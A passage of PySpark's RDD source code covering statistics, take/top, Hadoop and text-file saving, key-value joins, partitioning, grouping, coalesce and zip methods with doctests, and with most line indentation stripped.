>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
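    # Illustrative trace (not from the original source): take(3) on a sparsely
    # populated RDD first scans one partition; if that yields nothing, the next
    # pass tries four times as many partitions as have been scanned so far, and
    # once some rows are found the estimate interpolates to roughly
    # 1.5 * num * partsScanned / len(items), clamped between 1 and
    # 4 * partsScanned, so the driver rarely scans far more than it needs.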
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
        The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
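    # Illustrative sketch (added comment, not part of the original source);
    # assumes an active SparkContext named sc. Pre-partitioning pairs lets a
    # later reduceByKey with the same partition count reuse the partitioner
    # and skip a second shuffle:
    #   pairs = sc.parallelize([("a", 1), ("b", 2), ("a", 3)]).partitionBy(2)
    #   pairs.reduceByKey(lambda a, b: a + b, 2).collect()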
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
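    # Illustrative sketch (added comment, not part of the original source);
    # assumes an active SparkContext named sc. Computes (sum, count) per key:
    #   rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 3)])
    #   seq = lambda acc, v: (acc[0] + v, acc[1] + 1)
    #   comb = lambda a, b: (a[0] + b[0], a[1] + b[1])
    #   sorted(rdd.aggregateByKey((0, 0), seq, comb).collect())
    #   # [('a', (3, 2)), ('b', (3, 1))]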
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
        (e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
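    # Illustrative sketch (added comment, not part of the original source);
    # assumes an active SparkContext named sc. Without shuffle=True coalesce
    # can only reduce the partition count; with it the data is reshuffled and
    # the count may also grow:
    #   sc.parallelize(range(10), 2).coalesce(5, shuffle=True).getNumPartitions()
    #   # 5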
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
